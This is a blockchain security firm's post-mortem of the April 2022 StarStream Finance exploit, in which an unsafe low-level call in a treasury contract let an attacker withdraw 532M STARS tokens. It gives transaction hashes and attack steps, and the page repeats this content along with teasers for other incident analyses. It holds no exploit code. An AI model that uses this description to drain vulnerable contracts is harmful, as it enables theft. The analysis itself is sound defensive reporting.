Beosin2omb 3omb is currently being targeted by an arbitrage flash loan attack.
1/6 @_2omb suffered a series of flashloan attacks. We take one of the transactions (0xb134f5d0609863aeaab8b8aeb77765a7a0f1e6a379c27455845e46d2261c46a9) as an example to show the key steps. 2/6 Flashloan 139,504 2omb tokens in uniswap’s 2omb-wftm trading pair and send them to the attack contract 0x77a5d0cdd1f4069747d9236b50f09f34b6d5b378.3/6 Use the attack contract to split the funds, and swap in RedemptionPair (0x5D59cDaB08C8BbE4986173a628f8305D52B1b4AE) for multiple times. 4/6 Since in the R...
BeosinBeosin’s Analysis of the Arbitrum-based TreasureDAO exploit: Almost all Hacked NFTs Have been Return…
Beosin Eagle Eye reported that on March 3, 2022, Arbitrum-based marketplace TreasureDAO was exploited and over 100 NFTs were stolen. However, almost all hacked NFTs have been returned after a few hours of this exploit. The following is Beosin’s detailed analysis of this incident: #1 Overview The transaction initiation address exploited a logic flaw in the TreasureMarketplaceBuyer contract to obtain ERC-721 tokens at no cost by setting the totalPrice to zero through a vulnerability in the buyI...
BeosinAttacked 40 Times and Lost Around $1.7 Million: An analysis of Paraluni’s Exploit
On March 13, 2022, Beosin Eagle Eye reported that the Paraluni contract was hacked with a loss of about $1.7 million. Our security technical team has conducted a relevant analysis of this incident. #1 Overview Take the first attack transaction 0xd0b4a1d4964cec578516bd3a2fcb6d46cadefe1fea5a2f18eec4c0a496e696f9 as an example: Address list Attack address: 0x94bC1d555E63eEA23fE7FDbf937ef3f9aC5fcF8F Attack contract: 0x4770b5cb9d51EcB7AD5B14f0d4F2cEe8e5563645 ParaProxy: 0x633Fa755a83B015cCcDc451F82...
Beosin is a leading global blockchain security brand co-founded by several professors from world-renowned universities.
Beosin2omb 3omb is currently being targeted by an arbitrage flash loan attack.
1/6 @_2omb suffered a series of flashloan attacks. We take one of the transactions (0xb134f5d0609863aeaab8b8aeb77765a7a0f1e6a379c27455845e46d2261c46a9) as an example to show the key steps. 2/6 Flashloan 139,504 2omb tokens in uniswap’s 2omb-wftm trading pair and send them to the attack contract 0x77a5d0cdd1f4069747d9236b50f09f34b6d5b378.3/6 Use the attack contract to split the funds, and swap in RedemptionPair (0x5D59cDaB08C8BbE4986173a628f8305D52B1b4AE) for multiple times. 4/6 Since in the R...
BeosinBeosin’s Analysis of the Arbitrum-based TreasureDAO exploit: Almost all Hacked NFTs Have been Return…
Beosin Eagle Eye reported that on March 3, 2022, Arbitrum-based marketplace TreasureDAO was exploited and over 100 NFTs were stolen. However, almost all hacked NFTs have been returned after a few hours of this exploit. The following is Beosin’s detailed analysis of this incident: #1 Overview The transaction initiation address exploited a logic flaw in the TreasureMarketplaceBuyer contract to obtain ERC-721 tokens at no cost by setting the totalPrice to zero through a vulnerability in the buyI...
BeosinAttacked 40 Times and Lost Around $1.7 Million: An analysis of Paraluni’s Exploit
On March 13, 2022, Beosin Eagle Eye reported that the Paraluni contract was hacked with a loss of about $1.7 million. Our security technical team has conducted a relevant analysis of this incident. #1 Overview Take the first attack transaction 0xd0b4a1d4964cec578516bd3a2fcb6d46cadefe1fea5a2f18eec4c0a496e696f9 as an example: Address list Attack address: 0x94bC1d555E63eEA23fE7FDbf937ef3f9aC5fcF8F Attack contract: 0x4770b5cb9d51EcB7AD5B14f0d4F2cEe8e5563645 ParaProxy: 0x633Fa755a83B015cCcDc451F82...
Beosin is a leading global blockchain security brand co-founded by several professors from world-renowned universities.
Subscribe to Beosin
Subscribe to Beosin
Share Dialog
Share Dialog
<100 subscribers
<100 subscribers
On April 8, 2022, according to Beosin-Alert, StarStream Finance’s DistributorTreasury contract was exploited for 532M $STARS, then 900ETH was swapped out by the hacker. Beosin security team analyzed the incident and the results are as follows:
Starstream is a suite of products that provides revenue aggregation, revenue generation and one-click smart contracts on Metis L2 rollup. The protocol is maintained by various devs and managed by STARS holders.
● Transaction hash:
0xb1795ca2e77954007af14d89814c83b2d4f05d1834948f304fd9d731db875435
● Exploiter’s address:
0xffd90c77eaba8c9f24580a2e0088c0c940ac9c48
● Contract that launched the attack:
0x75381c1f12733fff9976525db747ef525646677d
● Attacked contract:
0x6f99b960450662d67bA7DCf78ac959dBF9050725
1. The project party (0x000007-d653cd) created StarstreamTreasury (0x1075da-0c90e9) and DistributorTreasury (0x6f99b9- 050725) contracts and transfered the ownership of the StarstreamTreasury contract to DistributorTreasury.
2. The attacker exploited the unsafe low-level call in the execute function of the DistributorTreasury contract to perform external function execution. This allowed the attacker to use this to call withdrawTokens in the StarstreamTreasury contract to withdraw a total of 532,571,155.859 $STARS from the contract.
The root cause of this vulnerability is that the DistributorTreasury contract has an insecure low-level call which can be utilized by an attacker to perform arbitrary function execution.
The current flow of funds is shown below:
In response to this incident, the Beosin security team recommends:
Smart contracts devs should pay attention to permission control when designing and implementing key operations;
Before the project goes live, it is highly recommended to conduct a professional contract security audit to avoid security risks. Beosin can provide professional security audit services. For more details, please visit our official website or contact us via Twitter, Discord or Telegram, etc. Beosin can provide professional security audit services. For more details, please visit our official website or contact us via Twitter, Discord or Telegram, etc.
Contact US
Website: https://beosin.com/
Email:contact@beosin.com
Twitter: https://twitter.com/Beosin_com
Telegram: https://t.me/beosin
Medium:https://medium.com/@Beosin
On April 8, 2022, according to Beosin-Alert, StarStream Finance’s DistributorTreasury contract was exploited for 532M $STARS, then 900ETH was swapped out by the hacker. Beosin security team analyzed the incident and the results are as follows:
Starstream is a suite of products that provides revenue aggregation, revenue generation and one-click smart contracts on Metis L2 rollup. The protocol is maintained by various devs and managed by STARS holders.
● Transaction hash:
0xb1795ca2e77954007af14d89814c83b2d4f05d1834948f304fd9d731db875435
● Exploiter’s address:
0xffd90c77eaba8c9f24580a2e0088c0c940ac9c48
● Contract that launched the attack:
0x75381c1f12733fff9976525db747ef525646677d
● Attacked contract:
0x6f99b960450662d67bA7DCf78ac959dBF9050725
1. The project party (0x000007-d653cd) created StarstreamTreasury (0x1075da-0c90e9) and DistributorTreasury (0x6f99b9- 050725) contracts and transfered the ownership of the StarstreamTreasury contract to DistributorTreasury.
2. The attacker exploited the unsafe low-level call in the execute function of the DistributorTreasury contract to perform external function execution. This allowed the attacker to use this to call withdrawTokens in the StarstreamTreasury contract to withdraw a total of 532,571,155.859 $STARS from the contract.
The root cause of this vulnerability is that the DistributorTreasury contract has an insecure low-level call which can be utilized by an attacker to perform arbitrary function execution.
The current flow of funds is shown below:
In response to this incident, the Beosin security team recommends:
Smart contracts devs should pay attention to permission control when designing and implementing key operations;
Before the project goes live, it is highly recommended to conduct a professional contract security audit to avoid security risks. Beosin can provide professional security audit services. For more details, please visit our official website or contact us via Twitter, Discord or Telegram, etc. Beosin can provide professional security audit services. For more details, please visit our official website or contact us via Twitter, Discord or Telegram, etc.
Contact US
Website: https://beosin.com/
Email:contact@beosin.com
Twitter: https://twitter.com/Beosin_com
Telegram: https://t.me/beosin
Medium:https://medium.com/@Beosin
No activity yet